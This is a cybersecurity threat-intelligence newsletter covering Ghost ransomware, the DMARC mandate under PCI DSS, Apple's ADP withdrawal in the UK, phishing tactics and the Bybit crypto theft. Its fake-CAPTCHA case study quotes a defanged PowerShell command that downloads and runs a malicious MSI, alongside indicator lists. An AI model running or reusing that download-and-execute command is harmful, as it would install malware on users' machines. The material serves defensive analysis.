Intelphreak - February 28, 2025
The Ghost/Cring Ransomware Gang's Unique Success; DMARC Required Under PCI DSS On March 31st of 2025; Apple Removes iCloud Encryption for UK; Recent High Efficacy Social Engineering Tactics; North Korean-Linked Attackers Stole $1.46 Billion in Crypto From Bybit Exchange

Precedence: Routine
BLUF: The Ghost/Cring Ransomware Gang's Unique Success; DMARC Will Be Required Under PCI DSS 4.0.1 On March 31st of 2025; Apple Removes End-to-End iCloud Encryption for UK Users; Recent High Efficacy Social Engineering Tactics Include Reverse Proxy 2FA Bypass, Watering Hole Poisoning With Fake CAPTCHAs, Leveraging The Darcula 3.0 Phishing Kit, and Evolved Credential Phishing; North Korean-Linked Attackers Stole $1.46 Billion in Crypto From Bybit Exchange via Supply-Chain Attack
BEGIN TEARLINE
[Adversary TTPs] New Insights on the Ghost Ransomware Gang and their Peculiar Success
On February 19th, 2025, the FBI, CISA, and MS-ISAC released a joint cybersecurity advisory on the Ghost (also known as Cring) ransomware gang (linked here). Ghost has victims in over 70 countries and specifically targets internet-facing systems with known, unpatched vulnerabilities (some of which are over a decade old!). This gang is also known as Cring, Cring Hand, RSA Virus, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.
That is a lot of names for one group, but this is not due to any errors or laziness in attribution - this group has an incredible suite of TTPs that make them incredibly stealthy and hard to follow. I extensively analyze this in the blog linked here, which contains new findings that even the FBI/CISA report missed! While reading all of the recent news reports on the gang, I had the burning question: What makes Ghost, in particular, so effective and successful, especially if they are only exploiting old, known vulnerabilities?
My investigation uncovered that all of the following factors, especially when working in tandem with each other, massively contribute to Ghost's success in both their profitability and their ability to give researchers and prosecutors a headache:
- Threatening double-extortion, while not actually exfiltrating that much data
- "Moving quickly" by taking mere hours or days to complete infiltration, privilege escalation and lateral movement, and final ransomware deployment
- Tailoring attacks and demands to the victim
- Demanding "reasonable" amounts of cryptocurrency equating to tens to hundreds of thousands of dollars, instead of millions like those of other high-profile gangs
- Heavily utilizing Cobalt Strike, open-source tools, and native Windows/PowerShell tools and commands
- Short, minimal, or no persistence
- Lack of domain registration
- Defense evasion, disablement, and impersonation, combined with LOTL
- Anti-forensics and anti-system-recovery
- Anti-debugging/anti-reverse engineering
- Inconsistency and fluidity
- Communication via encrypted email services and TOX (P2P, end-to-end encrypted messaging/video)
- Specific targeting:
- Public-facing applications and devices
- Critical infrastructure, schools and universities, healthcare, government, religious institutions, technology and manufacturing, and SMBs
- Avoiding hardened systems, and moving on when segmented networks are encountered that impede lateral movement
- Imitating/being imitated by other ransomware groups
In combination with the above factors, this group augments its success with the inconsistent use of at least 7 different executable ransomware payloads, 9-26+ different encrypted file extensions, at least 9 different ransom notes, and at least 41 different email addresses used to contact them.
Analyst comments: (SirPicklJohn) Again, please check out this linked blog to see the following:
- a full breakdown of how Ghost differentiates itself,
- the investigation into all of the factors making Ghost uniquely successful,
- recommendations on how to effectively defend against Ghost, and
- lists of all the resources/indicators of compromise currently linked to Ghost.
[Compliance] PCI DSS 4.0.1 Mandates DMARC By 31st March 2025
DMARC will become a requirement for PCI DSS version 4.0.1 compliance on March 31st, 2025. DMARC is Domain-based Message Authentication, Reporting & Conformance (DMARC). In order to implement DMARC, an organization must first implement the following controls:
-
Sender Policy Framework (SPF): SPF is a way to authenticate emails by checking the mail server IP of the sender is authorized to send emails from a certain domain. DNS records must be adjusted to ensure the proper email servers are authorized for sending. This control can prevent email spoofing where an attacker tricks a user into thinking an email is sent from a trusted entity. A guide to creating SPF records can be found here.
-
DomainKeys Identified Mail (DKIM): DKIM provides a way for recipient mail servers to verify the sender and ensure the integrity of the email in transit via a digital signature. The sender creates a DKIM record signature that includes various email fields such as the sender email (from) or the email body. This record signature is then hashed and encrypted with a private key that only the sender can access before being added to the email. The receiver can then use a matching public key found in the DNS records to decrypt & verify that hash is the same as the one they generate of the email fields. This process verifies that the email is actually from the sender & its content were not manipulated in the process of transmission. A guide to setting up DKIM can be found here.
With both of these verification processes in place, DMARC allows an organization to control what happens when a message fails both DKIM & SPF verification. DMARC Policies include doing nothing, quarantining the message, or outright rejecting the message. With DMARC, an organization can gather and analyze data about messages that are failing verification. These metrics can be helpful in measuring malicious use of your domains.
Analyst Comments: (ResidentGood) This update is very beneficial as requirements yield more compliance than guidelines. Even if your organization is outside the scope of PCI DSS, DMARC can be a very useful tool for staying on top of domain security. Managed Service Providers with clients that handle card data must ensure compliance by implementing DMARC before the 31st of March, 2025. After that date it will be looked for during PCI DSS audits. A solid guide on setting up DMARC can be found here.
[Law] Apple Pulls Advanced Data Protection from UK Users
Apple confirmed on Friday, February 21st that they will be pulling their iCloud Advanced Data Protection (ADP) feature for users in the UK (current & new) in an exclusive statement to TechCrunch. A spokesperson for Apple, Fred Sainz, said they are gravely disappointed that they will not be able to offer this feature to their UK users. Advanced Data Protection is an optional feature that allows users to enable end-to-end encryption for most of their iCloud data including backups, photos and notes. This keeps data secure in transit from user devices and Apple iCloud servers. It also protects against the manipulation of data.

-
The UK government issued a Technical Capability Notice to Apple demanding it give them full access to encrypted user iCloud data (originally reported by the Washington Post). Apple will likely appeal this notice to a secret panel & a judge in the UK, however it is against the law to not comply with the notice during the appeals process, and to reveal the details of the secret notice.
-
This order was issued under the UK Investigatory Powers Act of 2016 which is quite controversial amongst privacy advocates across the globe. The purpose of this legislation is to enhance the capabilities of security agencies, intelligence agencies, law enforcement agencies, and public authorities to intercept and access communications. The law was designed with independent oversight & safeguards to protect the civil liberties of UK citizens. On February 6th & 7th of 2025, a representative of the UK Home Office said “We do not comment on operational matters, including for example confirming or denying the existence of any such notices…“ according to multiple media publications.
-
Data like health information, iMessages, FaceTime calls, and keychain credentials will still be protected by Apple encryption. Data that is not protected by end-to-end encryption will be both readable by Apple and entities that successfully obtain a subpoena for that information. Apple cannot automatically disable ADP for UK users that have it enabled, but they will require the user to disable it in order to keep using their iCloud account. This would aid in law enforcement efforts to collect evidence on suspects that use iCloud encryption.
-
The US Director of National Intelligence, Tulsi Gabbard, on February 25th wrote a letter to 2 US legislators stating the US is investigating whether this development will affect US Apple users and violate a bilateral agreement between the US & UK. The treaty in question is the CLOUD act which prevents both the US & the UK from demanding data on the citizens of the other country.
-
Apple has quite a history of legal conflicts with various government entities over protecting the privacy of their users. The most famous case being in 2016 when they won a case against a US government order to unlock the iPhone of a suspected terrorist. In a 2022 statement made to The Guardian, UK government officials came out against Apple introducing end-to-end encryption for cloud storage.
Analyst Comments: (ResidentGood) It is hard to find official information on this story as the order itself has not been released to the public. Privacy advocates are railing against this development as they claim it sets a precedent for more authoritarian governments to follow suit. While protecting victims is a high priority, building vulnerabilities in technology can lead to greater breaches of privacy & cyberattacks. Having more information about security controls that are not in place in certain jurisdictions makes it easier for attackers to target victims in those jurisdictions. Stories like this one are important to follow because they can set greater precedents for the cybersecurity industry as a whole.
[Adversary TTPs] The Latest High-Efficacy Tactics Used in Social Engineering Attacks
Social engineering and phishing attacks remain a constant concern in cybersecurity! The following four case studies represent some of the high-efficacy attack techniques that threat actors have been using in the wild recently:
"EvilProxy" Reverse Proxy Attacks
In this kind of attack, the session cookie/token of a user is stolen by the adversary using something called a "reverse proxy", which acts as an intermediary between the end-user and the cloud service (such as Microsoft 365). This bypasses the need for a user to input login credentials or utilize MFA tokens, as the user's session has already been authenticated with these.
Attack Chain Breakdown:
- Phishing email is sent to the victim (potentially from a compromised user that the victim trusts).
- The link in the email goes to a bogus intermediary site, such as the following:
- Note the code of the malicious site, which contains an encoded link to the reverse proxy:
- aHR0cHM6Ly8wLmluZHVzdHJpYWx0cnVja3Muc2l0ZS8/dXNlcm5hbWU9 (this is an example of obfuscation for defense evasion)
- hXXps[:]//0[.]industrialtrucks[.]site/?username=
- ^The code above takes the email that the user enters and then makes a request with it as a parameter to the industrialtrucks site, which is the actual reverse proxy that compromises the user.
- If the victim user is logged into the targeted cloud service in another tab, then that already-authenticated session is passed through the reverse proxy (compromising the session), to the legitimate cloud service.
- With access to the account, the attacker is able to then employ a variety of post-exploitation techniques:
- As observed in this case, the attacker can add email forwarding rules (MITRE ATT&CK Technique T1114.003) to siphon emails (i.e., immediately removing them from the victim's inbox and into a more subtle folder the attacker monitors, so the victim never knows they received an email) from another person that the victim knows, in order to target that other person.
- The initial phishing email, or new phishing emails, can be sent to other personnel.
- Data in the account can begin to be exfiltrated.
Water-Hole Attack with Fake CAPTCHAs
In this attack, a legitimate website (or website plugin that legitimate sites use) is compromised and given malicious code that compromises end-users who browse the website (which is titularly analogous to "poisoning the watering hole"). One such implementation of this is in executing a fake CAPTCHA attack, where a fake CAPTCHA is displayed that copies a malicious PowerShell script to the user's clipboard, and instructs them to do a series of hotkeys/keyboard combinations to execute that code.
Attack Chain:
- User browses a legitimate website (which has subtly been compromised), and after about 30-60 seconds, a black overlay appears with a CAPTCHA: (note that the image has been heavily obfuscated/redacted to protect the identity of the victim)
- After clicking on the CAPTCHA, the user is walked through a series of steps to copy and paste the malicious PowerShell script:
(Note that you can even see the "Successful" dialogue box pop up to indicate that the script was successfully copied to the user's keyboard.)
- The following script (with demilitarized links/extensions) is copied:
cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\3aw[.]msi'; Invoke-RestMethod -Uri 'https[:]//qq51f[.]short[.]gy/1' -OutFile $path; Start-Process $path;
- Malware is installed on the victim's computer, before doing all the nasty things that malware can do.
Further analysis of this specific attack (who's behind it?):
- In this attack, qq51f[.]short[.]gy/1 (hosted on short.io, a URL shortening site) was requested, which in turn downloaded the malicious
01.brr
file from the hosting site hXXps[:]//bestiamos[.]com/ - Note that bestiamos, hosted by CloudFlare on 104[.]21[.]35[.172] (replicated on 172[.]67[.]178[.]15, likely for redundancy/backup purposes), hosts 694 other domains (source: whois.com). The name "Julia Smith" is likely bogus, and the address does not exist, but the registrant's email (gustavusabseits[@]gmail.com) has been used to register at least 225 other domains (source: whois.com):
Artifacts from the attack:
- 3aw.msi
- Author: Plash Amrita
- Program name: WiX Toolset (4.0.0.0)
- Requests to download
01.brr
- Various folders:
- fr_patch_test
- Girlfriend
- helpAdvanced_test
- Womenfolk
- Miscellaneous Malicious Files:
- taskbg_v1_x64.lnk
- sqsign.lnk
- MSBuild.exe (in Microsoft.NET folder)
- RoboTaskLite.exe
- fell.jpg
- residentiary.php
- rtl280.bpl
- vcl280.bpl
- Requests to qq51f[.]short[.]gy or bestiamos[.]com
- The following Solana crypto address: 5V12gWimv9jG6xBfnQ1txHc3vg5rvA3cjaSeYiVs3YXp (found on an illegitimate lookalike [gettrumpmeme[.]us] of the official TRUMP memecoin site [gettrumpmemes.com] - the attacker registered 6 lookalikes in total)
- I did not take the time to run whois lookups on every single domain that was registered by gustavusabseits[@]gmail.com, but they may offer more insight into the source of this attack!
PhaaS and Site-Cloning by Darcula
Sophisticated phishing attacks are easier for novice attackers to execute than ever before! The threat actor "darcula" recently hit the news by announcing a major feature update to their Chinese and playfully cat-themed "darcula-suite" PhaaS (Phishing-as-a-Service) platform. Darcula was originally discovered in July 2023 by the researcher Oshri Kalfon (who has a brilliant writeup on what he found, that you can check out here: part 1, part 2), and the newly-released version (v3) of the platform has the following features for end users for both protection, ease-of-use, and robust fraud mechanisms:
-
User-Friendly, Enterprise-Grade Administrator Dashboard:
- Developed with Docker, Node, React, SQLite, and 3rd-party NPM libraries. These all increase user-experience and accessibility.
- Simplified campaign management
- Performance dashboard
- Real-time logs of stolen credentials, where victims are browsing, etc.
- Automatic Telegram notifications after someone falls victim
-
Ability to Send RCS and iMessage Texts:
- This bypasses SMS firewalls and employs end-to-end encryption (reducing the efficacy of filters and detection mechanisms)
-
Anti-Detection Features:
- Randomized deployment paths to prevent hostname-level analysis
- IP blocking
- User-agent blocking to stop crawlers and scrapers
- Device-type restrictions
- Client-side page rendering with React, requiring a headless browser that prevents detection by some tools and providers
- Tips from darcula, including hiding the origin server via CDN providers such as Cloudflare
-
Automated Credit Card Theft and Conversion Tools
- Stolen credit card data can be turned into virtual card images for use in digital wallets/payment apps (like Apple Pay)
- Note. Darcula-linked Telegram groups are already selling burner phones with pre-loaded stolen cards:
-
Custom phishing kit generator
- This is one of the most consequential features, allowing users to clone any website with Puppeteer and modify elements like login fields, payment forms, 2FA prompts, etc. Pre-made templates are available.
The Darcula-Suite, with the user editing elements of a cloned USPS site in preparation of an attack.
- This is one of the most consequential features, allowing users to clone any website with Puppeteer and modify elements like login fields, payment forms, 2FA prompts, etc. Pre-made templates are available.
Note that Netcraft, a cybercrime disruption and takedown company that is one of the main researchers investigating darcula, has highlighted how prolific darcula phishing sites are. Using a worldwide proxy network and various tactics to bypass the darcula platform's defenses (read their report here), since 2024 Netcraft has...
- detected 120 new domains hosting darcula phishing pages each day;
- blocked about 96,600 Darcula 2.0 domains;
- blocked about 20,200 phishing sites; and
- blocked 30,900 IP addresses associated with darcula sites.
With version 3.0 of darcula-suite released, it is harder to detect and stop darcula attacks, the "average sophistication" of PhaaS and phishing campaigns is increasing, and sophisticated phishing attacks are even more accessible to anybody who wants to use them.
Classic Credential Phishing
These haven't gone away either! However, due to advances in security filtering and phishing detection, the sophistication of credential phishing pages has also evolved, with an attack chain looking like the following:
- A phishing email (e.g., a fake "Request For Information" response email) is sent to the end user, who clicks a link to an external file hosting site. Using this intermediary site helps phishing emails bypass security mechanisms because it does not actually contain any malicious code.
- The links in the external file hosting site, after being clicked, redirect the user to the actual phishing page that impersonates a service like Microsoft 365.
Note that this landing page, after getting past the CAPTCHA on the /BoDc/ page, was located at a different URL every time it was visited. Additionally, after compromising the user, the attacker was free to do any other post-exploitation activities:
- Sending similar phishing emails to other users in the victim's address list (and then responding if they question the legitimacy of the email).
- Stealing sensitive documents and data stored in the victim's account.
- Registering their own MFA (if a previous MFA token or code was stolen) for persistence.
- Employing MITRE ATT&CK Technique T1114.003 (Email Forwarding Rule).
Analyst Comments: (SirPicklJohn) Thanks for reading! Hopefully this gives you an inside view into the real-world attacks and techniques that are currently being used in the wild! Defenders can implement the following steps to effectively mitigate these attacks:
- SETA: First and foremost, implement a robust security education, training, and awareness (SAT/SETA) program, with the leader of it being an articulate individual who understands its immense value. Sometimes, the only thing that prevents (or enables!) an attack is the human element!
- Tips on MFA, from One Defender to Another: Rather than leaving you with the endlessly-repeated advice to "enable multifactor authentication on all cloud accounts", which you should do, I'd like to also say that there are still plenty of people who have never used multifactor authentication before and do not know what it is. You will likely receive pushback when mandating organization-wide multifactor authentication, but you need to stand firm, calmly articulate how important it is, and walk users through the process while troubleshooting their issues. Additionally, "phishing-resistant MFA" can prevent basic attacks like the credential phishing attack above by sending push notifications or displaying a window for a security key rather than just asking for a code - this is because a phishing site like blelinelipor will not be able to send a push notification to a user's phone or utilize the user's security key to compromise the account, while the site can still ask for and use a valid MFA code.
- Conditional Access Policies: Conditional access policies are strong security controls that restrict or grant user access based on "if-then" statements. For example, "geofencing" users by restricting their logins to certain geographic areas, requiring all users to use a certain kind of MFA, allowing or denying logins from certain types of devices on certain types of networks and IP ranges, etc.
Thank you for reading - stay safe!
[Major Incident] Hackers Steal $1.46 Billion in Cryptocurrency Assets From Bybit Exchange
On Friday, February 21, 2025, the popular Dubai-based cryptocurrency exchange Bybit lost $1.46 billion (in USD) in a cyberattack. The attackers stole this sum in the form of Ethereum and Staked Ether by creating malicious transactions to transfer the funds from a cold wallet (a crypto wallet where the private keys are stored offline) to a wallet address controlled by the threat actor. After exfiltration, the funds were laundered to prevent tracing.
According to Bybit, several third-parties collaborated in investigating & containing this situation including:
- Forensic Analysis: Mandiant, Verichains, and Sygnia.co
- Bad Actor Tracing & Identification: ZeroShadow
- Tagging Exploited Addresses on Blockchains: Chainalysis, Elliptic, TRM, Goplus, SEAL911, and ZachXBT
- Security Advisory: SlowMist, BlockSec, BEOSIN
- Compliance & Risk Assessment: VerifyVASP, AML Bot, CryptoForensic
- Cross-chain security Measures: Binance, Coinbase, Bitget, Polygon, Arbitrum, Optimism, Wormhole, Synapse, Connext, Chainflip, Across.to, Symbiosis.finance, AVAX, ChangeNow, fixedfloat, and cBridge
The contract with malicious transfer logic was located at 0x96221423681A6d52E184D440a8eFCEbB105C7242
The contract with malicious withdrawal abilities was located at 0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516
According to the preliminary investigation report from Verichains: “[t]he attacker successfully created a multi-signature transaction involving three signers, including the CEO of Bybit. This transaction upgraded Bybit’s multi-signature contract for Cold Wallet 1 (0x1Db92e2EbE8E0c075a02BeA49a2935BcD2dFCF4
) on Safe.Global, pointing to a malicious contract (0xbDd077f651EBe7f7b3cE16fe5F2b025BE2969516
) that was deployed three days earlier.” For emptying the wallets, the sweepETH
& sweepERC20
backdoors were used.
List of Initial Threat Actor Addresses:
0xdd90071d52f20e85c89802e5dc1ec0a7b6475f92
0x0fa09c3a328792253f8dee7116848723b72a6d2e
0xe8b36709dd86893bf7bb78a7f9746b826f0e8c84
0x47666Fab8bd0Ac7003bce3f5C3585383F09486E2
0xa4b2fd68593b6f34e51cb9edb66e71c1b4ab449e
0x1542368a03ad1f03d96D51B414f4738961Cf4443
0x36ed3c0213565530c35115d93a80f9c04d94e4cb

Sygnia’s investigation found direct injection of malicious JavaScript into a Safe{Wallet} Amazon S3 bucket. This code was designed to alter crypto transactions during signing. It was also designed to activate only for transactions involving Bybit’s main contract address and an unknown test address controlled by the attacker. After execution, the injected S3 resource was replaced with one that did not contain the malicious JavaScript, a technique to avoid detection. Since the attack came from Safe{Wallet}’s infrastructure, the investigation found that Bybit’s infrastructure had not been directly compromised.
During the incident response process, Bybit migrated its funds out of Safe{Wallet} addresses. Bybit created an API of continuously updated suspicious wallet addresses that have been blacklisted. They have also released a HackBounty website to get help from the industry in tracking down the hackers’ wallet. Successful interceptions will receive a 10% commission. As of February 24, Bybit claims to have replaced 100% of the stolen funds via loans, large deposits from abundant crypto owners, and purchases of Ethereum.
The FBI confirmed that this attack was carried out by a North Korean APT known as TraderTraitor which has ties to the Lazarus Group. This group is also tracked under the names APT38, BlueNoroff, and Stardust Chollima.
Safe{Wallet} confirmed in a public statement that the compromise of a developer machine led to this incident. They claimed that SAFE contracts were not affected by the incident. In response, Safe conducted an investigation, restored Safe{Wallet} to the main Ethereum chain in phases, reconfigured infrastructure and changed all credentials.
Analyst Comments: (ResidentGood) This is one of the largest cryptocurrency exfiltrations in recent history. The threat actor being tied to North Korea lines up with the trend of North Korean APTs using state-sponsored cyber attacks to finance military operations. This story highlights the importance of cryptocurrency organizations to secure themselves from supply-chain attacks. Your security controls are not as effective if another organization that is integrated into your tech stack is compromised.
END REPORT
If you are interested in anything Cybersecurity, come check out our Discord
Sources:
The Latest High-Efficacy Social Engineering Attack Tactics
- Note that all of the information, unless cited below, on these tactics/sub-stories (besides the one on Darcula) is sourced from cyberattack investigations by SirPicklJohn in recent months. These tactics continue to be observed in the present-day.
- "Darcula - 达尔库拉" - Oshri Kalfon (July 30, 2023)
- "Darcula - 达尔库拉 Part 2" - Oshri Kalfon (August 2, 2023)
- "Darcula PhaaS 3.0 Auto-Generates Phishing Kits for Any Brand" (February 21, 2025)
- "Cybercriminals Can Now Clone Any Brand's Site in Minutes Using Darcula PhaaS v3" (February 21, 2025)
- "Cybercriminals Can Now Clone Any Brand's Site in Minutes Using Darcula PhaaS v3" (February 20, 2025)
- "Out of the shadows – ’darcula’ iMessage and RCS smishing attacks target USPS and global postal services" (March 27, 2024)
- "New Darcula iMessage Attack Targets iPhone Users In 100 Countries" (2024, March 28)
- "Email Collection: Email Forwarding Rule" - MITRE ATT&CK (2024, October 14)
- "EvilProxy Phishing Attack Strikes Indeed" (2023, October 1) <- Note that this source was used to provide me (SirPicklJohn) with the initial context of what an EvilProxy attack was when I was faced with one in the wild, over a year after this source was posted.
PCI DSS 4.0.1 Mandates DMARC By 31st March 2025
- PCI-DSS v4.0.1 (June 11, 2024)
- Just Published: PCI DSS v4.0.1 (June 11, 2024)
- Implementing DMARC to Meet PCI DSS V4.0 Requirements (August 18, 2023)
- DMARC for PCI DSS 4.0 Compliance – Mandatory from 2025 (January 12, 2025)
- PCI DSS 4.0 Mandates DMARC By 31st March 2025 (February 20, 2025)
- What Is DKIM? (n. d.)
- Set up SPF (n. d.)
- How to Easily Set Up a DKIM Record - Step-by-Step Guide (January 16, 2025)
Apple Pulls Advanced Data Protection from UK Users
- Apple pulls iCloud end-to-end encryption feature for UK users after government demanded backdoor (February 21, 2025)
- U.K. orders Apple to let it spy on users’ encrypted accounts (February 7, 2025)
- How to turn on Advanced Data Protection for iCloud (September 16, 2024)
- Definition: end-to-end encryption (E2EE) (June 2021)
- Apple vows to resist FBI demand to crack iPhone linked to San Bernardino attacks (February 17, 2016)
- Privacy changes set Apple at odds with UK government over online safety bill (December 8, 2022)
- Investigatory Powers Act 2016 (March 25, 2022)
- UK Home Office silent on alleged Apple backdoor order (February 7, 2025)
- The software UK techies need to protect themselves now Apple's ADP won’t (February 24, 2025)
- Apple pulls end-to-end encryption in UK, spurning backdoors for gov’t spying (February 21, 2025)
- US examining whether UK's encryption demand on Apple broke data treaty (February 26, 2025)
- Concerns Over Apple's UK iCloud Encryption Deactivation (February 24, 2025)
- Apple Withdraws Strong Encryption Feature for All UK Users (February 21, 2025)
- Apple pulls iCloud end-to-end encryption feature in the UK (February 21. 2025)
- UK secretly orders Apple to let it spy on iPhone users worldwide (February 7, 2025)
New Insights on Ghost's Unique Success
- "#StopRansomware: Ghost (Cring) Ransomware (PDF)" - FBI, CISA, and MS-ISAC Joint Advisory (2025, February 19)
- "#StopRansomware: Ghost (Cring) Ransomware (Website)" - CISA (2025, February 19)
- "ランサムウェア「Cring」の被害が国内で拡大、VPN脆弱性を狙い侵入" // "Ransomware 'Cring' spread in the country, intruding for VPN vulnerability" (Translation by Reverso Context) - (Japanese) Trend Micro (2021, May 20)
- "Ghost Ransomware: Striking Before You Even Know It’s There" - Vectra (2025, February 26)
- "Ghost ransomware virus - removal and decryption options" - PCrisk (2023, December 8)
- "Ransomware-Liste inkl. Decryptor (zum Entschlüsseln)" (German) (2024)
- "Шифровальщики-вымогатели - The Digest "Crypto-Ransomware: Cring Hand-Ransomware, Crypt3r Ransomware, Variants: CRING, RSA, Vjiszy1lo, Ghost, Phantom, VnBeHa99y, Pay4it" - (Russian) Amigo-A (2021, January 14)
- "Шифровальщики-вымогатели - The Digest "Crypto-Ransomware: Parasite Ransomware, Aliases: SharpCrypter, Paralock" - (Russian) Amigo-A (2021, January 4)
- "Ransomware Research - Cring" - elastio (n.d.)
- "Ransomware Research - Parasite" elastio (n.d.)
- "2022 年 6 月勒索病毒态势分析" - (Chinese) ioc.one (???) <- If you can find out more from this source, please let me know!
- "国家互联网应急中心(CNCERT/CC) - 勒索软件动态周报" - (Chinese Intelligence Report on Ransomware) (2022, June) <- Translated and summarized with GPT-4o via duck.ai, and with Reverso Context
- "Sectrio Malware Report" (2022) <- Only used in a rabbit hole I went down to see whether or not I could trust a different source that provided potential emails used by Ghost (like starmoon@my[.]com, bleepbloopbop@protonmail[.]com, and r3wuq@tuta[.]io). I found that I couldn't and these emails are likely not related to Ghost.
- "Unpatched vulnerable VPN servers hit by Cring ransomware" (2021, April 8)
- References this insightful Kaspersky report: "Vulnerability in FortiGate VPN servers is exploited in Cring ransomware attacks" (2021, April 7)
- "T1055 Process Injection" - MITRE ATT&CK (2023, March 30)
- "Services on NBU Clients" - Veritas (2011)
- "A new #Cring #Ransomware" - Amigo-A on Twitter/X (2021, January 21)
- "!!!!deReadMe!!!.txt" - Pastebin from Demonslay335 (one of the researchers related to the BleepingComputer forums that initially investigated Cring) (2021, January 26th)
- "What Are Malicious Newly Registered Domains?" - Palo Alto Networks (n.d.) <- Used, alongside AI, to determine what the advantages and drawbacks of a ransomware gang registering and hardcoding a domain versus an IP address are.
- "CISA and FBI Report Ghost Ransomware Breached 70 Countries" (2025, February 21)
- "FBI warns a cyber attack under way and you should back up your data" (2025, February 21)
- "FBI Says Backup Now - Advisory Warns Of Dangerous Ransomware Attacks" (2025, February 22)
- "Warning issued over prolific 'Ghost' ransomware group" (2025, February 24)
- "Cring Ransomware" - England National Health Service (2021, April 13) <- This initially led to a huge pivot off of the "Vjiszy1lo" name/alias associated with Ghost. Presumably the federal government will have done their due diligence and verified this information.
- "New Cring ransomware hits unpatched Fortinet VPN devices" (2021, April 7)
- "Cring ransomware group exploits ancient ColdFusion server" (2021, September 21)
- "Shadow-Pulse/Ransomlist.csv" (List of ransomware gangs, aliases, algorithms, etc.) <- Note that, despite the rich information, I cannot verify any of the information in this resource as-is.
- "Common TTPs of modern ransomware groups" - Kaspersky via Wayback Machine (2022) <- The only information utilized in this report was the graph that stated that Cring emerged in December 2020.
- "RSA Virus Files of Ransomware - How to remove Cring virus?" (2021, February 17) <- Do not download any tools from this article.
- "Remove Cring Ransomware" (2023, January 3) <- Do not download any tools from this article.
- "How to remove Cring Ransomware and decrypt .cring" (2021, February 17) <- ABSOLUTELY do not download any tools from this article. One of the first links is to Afflat3b2.com, a known distributor of malware and PUPs. (Article with more information on Afflat3b2)
- "xtaci/smux" (Stream Multiplexing Library for golang) <- Linked in analysis of cring.exe on Hybrid Analysis
- Ransomware Time-to-Ransom and Monetary Statistics:
- "2025 Cyber Threat Report" - Huntress (2025, February 5th) <- Note that the data for this report is from 2024.
- Linked from this article: "Dwell Time Reduced Further as Attacker Infect in Four Hours" (2025, February 17)
- "Ransomware Dwell Time Hits Low Of 24 Hours" Secureworks/Sophos (2023, October 5)
- "Roundup: The top ransomware stories of 2024"
- "2025 Cyber Threat Report" - Huntress (2025, February 5th) <- Note that the data for this report is from 2024.
- Other Parasite/Paras1te-specific sources: (used to determine links and distinctions between Ghost and Parasite)
- "Parasite ransomware targeting French users actively spreading in the wild" (2021, February 26)
- "Parasite Ransomware (.arazite)" (2021, May 3)
- "How to remove Paras1te ransomware from the infected machine" PCrisk (2021, November 7)
- "Paras1te Ransomware" (2021, February 10)
- BleepingComputer Forums:
- "Crypt3r (Cringe/Ghost/Cring) Ransomware (.cring, .phantom) Support Topic" (2021, January 19)
- "Ransomware infected, File extension.Pay4IT" (2021, April 10)
- "ransomware Cring Hand - Crypt3r" (2021, October 24)
- "MS17-010 - ETERNALBLUE - Exploit" (2020, January 22)
- ".vjiszy1lo extension, no ransom note." (2021, March 4)
Hackers Steal $1.46 Billion in Cryptocurrency Assets From Bybit Exchange
- Bybit Confirms Security Integrity Amid Safe{Wallet} Incident – No Compromise in Infrastructure (February 26, 2025)
- Safe{Wallet} Statement on Targeted Attack on Bybit (February 26, 2025)
- LazarusBounty (February 23, 2025)
- Bybit Releases API of Suspicious Wallet on “Black List” as Part of Recovery Bounty Program (February 23, 2025)
- Bybit Hack Report (n. d.)
- North Korea Responsible for $1.5 Billion Bybit Hack (February 26, 2025)
- Technical Analysis of the Bybit Hot Wallet Exploit (February 24, 2025)
- Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers (February 27, 2025)
- Bybit hacker launders $605M ETH, over 50% of stolen funds (February 28, 2025)
- FBI confirms Lazarus hackers were behind $1.5B Bybit crypto heist (February 27, 2025)
- TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies (April 18, 2022)
- Lazarus hacked Bybit via breached Safe{Wallet} developer machine (February 26, 2025)
- Hacked crypto exchange Bybit offers $140M bounty to trace stolen funds (February 26, 2025)
- Bybit has ‘fully closed the ETH gap’ CEO says after $1.4B Lazarus hack (February 24, 2025)
- Crypto exchange Bybit says it was hacked and lost around $1.4B (February 21, 2025)
- Hacker steals record $1.46 billion from Bybit ETH cold wallet (February 21, 2025)
- Bybit Loses $1.5B in Hack but Can Cover Loss, CEO Confirms (February 21, 2025)
- Cold Storage: What It Is, How It Works, Theft Protection (February 10, 2025)